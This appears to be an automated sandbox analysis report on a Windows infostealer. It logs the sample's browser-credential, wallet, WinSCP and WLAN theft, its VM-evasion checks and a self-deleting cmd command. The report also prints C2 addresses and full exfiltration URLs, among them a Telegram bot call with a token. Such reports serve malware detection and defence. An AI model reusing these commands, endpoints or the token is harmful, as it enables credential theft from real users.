                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -595719s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -595609s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 599764Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 599544Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 599218Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 599109Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 599000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 598890Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 598781Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 598672Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 598562Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 598453Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 598344Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 598234Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 598125Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 598015Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 597906Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 597797Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 597687Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 597578Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 597469Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 597359Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 597250Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 597141Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 597031Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 596922Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 596812Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 596703Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 596594Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 596484Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 596375Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 596265Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 596155Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 596047Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 595937Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 595826Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 595719Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 595609Jump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000002.00000000.1237262342.0000026B64C32000.00000002.00000001.01000000.00000006.sdmp, build.exe.0.drBinary or memory string: qemu'
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                Source: build.exe, 00000002.00000002.2295304015.0000026B66887000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: build.exe.0.dr, vmG.csReference to suspicious API methods: GetProcAddress(a4, rU)
                Source: build.exe.0.dr, nf.csReference to suspicious API methods: OpenProcess(1040u, bInheritHandle: false, aiGT.Id)
                Source: build.exe.0.dr, nf.csReference to suspicious API methods: ReadProcessMemory(intPtr, lpBuffer.BaseAddress, array, array.Length, out var lpNumberOfBytesRead)
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\build.exe"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssidJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 3Jump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Users\user\AppData\Local\Temp\build.exe VolumeInformationJump to behavior
                Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: build.exe PID: 6500, type: MEMORYSTR
                Source: Yara matchFile source: 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: build.exe PID: 6500, type: MEMORYSTR
                Source: build.exe, 00000002.00000002.2295681999.0000026B66EB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets
                Source: build.exe, 00000002.00000002.2295681999.0000026B670AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 5\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
                Source: build.exe, 00000002.00000002.2295681999.0000026B66E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $%AppData%\Jaxx\Local Storage\leveldb
                Source: build.exe, 00000002.00000002.2295681999.0000026B66E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus
                Source: build.exe, 00000002.00000002.2295681999.0000026B66ECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: dC:\Users\user\AppData\Roaming\Binance
                Source: build.exe, 00000002.00000002.2295681999.0000026B66E78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets
                Source: C:\Users\user\AppData\Local\Temp\build.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: Process Memory Space: build.exe PID: 6500, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: build.exe PID: 6500, type: MEMORYSTR
                Source: Yara matchFile source: 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: build.exe PID: 6500, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                Windows Management Instrumentation
                1
                LSASS Driver
                1
                LSASS Driver
                11
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                File and Directory Discovery
                Remote Services1
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Native API
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                3
                Obfuscated Files or Information
                1
                Credentials in Registry
                24
                System Information Discovery
                Remote Desktop Protocol2
                Data from Local System
                1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Access Token Manipulation
                2
                Software Packing
                Security Account Manager221
                Security Software Discovery
                SMB/Windows Admin Shares1
                Email Collection
                21
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
                Process Injection
                1
                Timestomp
                NTDS1
                Process Discovery
                Distributed Component Object ModelInput Capture1
                Non-Standard Port
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets151
                Virtualization/Sandbox Evasion
                SSHKeylogging3
                Non-Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Masquerading
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input Capture4
                Application Layer Protocol
                Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                Virtualization/Sandbox Evasion
                DCSync1
                System Network Configuration Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Access Token Manipulation
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                Process Injection
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545189 Sample: file.exe Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 45 api.telegram.org 2->45 47 ip-api.com 2->47 59 Suricata IDS alerts for network traffic 2->59 61 Found malware configuration 2->61 63 Antivirus / Scanner detection for submitted sample 2->63 67 11 other signatures 2->67 9 file.exe 3 2->9         started        signatures3 65 Uses the Telegram API (likely for C&C communication) 45->65 process4 file5 41 C:\Users\user\AppData\Local\Temp\build.exe, PE32 9->41 dropped 43 C:\Users\user\AppData\Local\...\file.exe.log, CSV 9->43 dropped 12 build.exe 14 6 9->12         started        process6 dnsIp7 49 api.telegram.org 149.154.167.220, 443, 63170 TELEGRAMRU United Kingdom 12->49 51 209.38.221.184, 63169, 8080 ATT-INTERNET4US United States 12->51 53 2 other IPs or domains 12->53 69 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->69 71 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->71 73 Tries to steal Mail credentials (via file / registry access) 12->73 75 5 other signatures 12->75 16 cmd.exe 1 12->16         started        19 cmd.exe 1 12->19         started        21 cmd.exe 1 12->21         started        signatures8 process9 signatures10 55 Uses netsh to modify the Windows network and firewall settings 16->55 57 Tries to harvest and steal WLAN passwords 16->57 23 netsh.exe 2 16->23         started        25 conhost.exe 16->25         started        37 2 other processes 16->37 27 netsh.exe 2 19->27         started        29 conhost.exe 19->29         started        39 2 other processes 19->39 31 conhost.exe 21->31         started        33 timeout.exe 1 21->33         started        35 chcp.com 1 21->35         started        process11

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                file.exe39%ReversingLabsByteCode-MSIL.Trojan.Heracles
                file.exe100%AviraHEUR/AGEN.1307423
                file.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\build.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                http://ip-api.com0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                http://www.w3.or0%URL Reputationsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                https://www.ecosia.org/newtab/0%URL Reputationsafe
                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                https://support.mozilla.org0%URL Reputationsafe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                ip-api.com
                208.95.112.1
                truefalse
                  unknown
                  api.telegram.org
                  149.154.167.220
                  truetrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    http://41.216.183.9:8080/sendData?pk=MDhCREMyMTRGMDQ3ODIxQUI0NDJDRjRDQ0IzMEMxMUQ=&ta=U29mdHdhcmU=&un=ZnJvbnRkZXNr&pc=OTI3NTM3&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA==true
                      unknown
                      http://ip-api.com/line?fields=query,countryfalse
                        unknown
                        https://api.telegram.org/bot7722280561:AAEgRsAuRdqeD2qmEUjdhEM6F9R5eAxwIT4/sendMessage?chat_id=7734728653&text=%23Software%20%20%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E927537%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.12Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F209.38.221.184%3A8080%2Fget%2FI85OAzj7Op%2FyLWFd_user%40927537_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F209.38.221.184%3A8080%2Fget%2FI85OAzj7Op%2FyLWFd_user%40927537_report.wsr%22%7D%5D%5D%7D&parse_mode=HTMLfalse
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabbuild.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://209.38.221.184:80802build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmpfalse
                            unknown
                            https://duckduckgo.com/ac/?q=build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://185.217.98.121:80build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              https://138.2.92.67:443build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                https://api.telegram.orgbuild.exe, 00000002.00000002.2295681999.0000026B66D86000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmptrue
                                  unknown
                                  https://api.telegram.org/botbuild.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmptrue
                                    unknown
                                    http://209.38.221.184:8080/%79%4C%57%46%64%5F%66%72%6F%6E%74%64%65%73%6B%40%39%32%37%35%33%37%5F%72%build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      http://209.38.221.184:8080/yLWFd_userbuild.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        http://167.235.70.96:8080build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          http://20.78.55.47:8080build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://107.161.20.142:8080build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              https://5.196.181.135:443build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                https://api.telegram.org/bot7722280561:AAEgRsAuRdqeD2qmEUjdhEM6F9R5eAxwIT4/sendMessagebuild.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmptrue
                                                  unknown
                                                  http://101.43.160.136:8080build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://41.216.183.9:8080/sendDatabuild.exe, 00000002.00000002.2295681999.0000026B66CE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
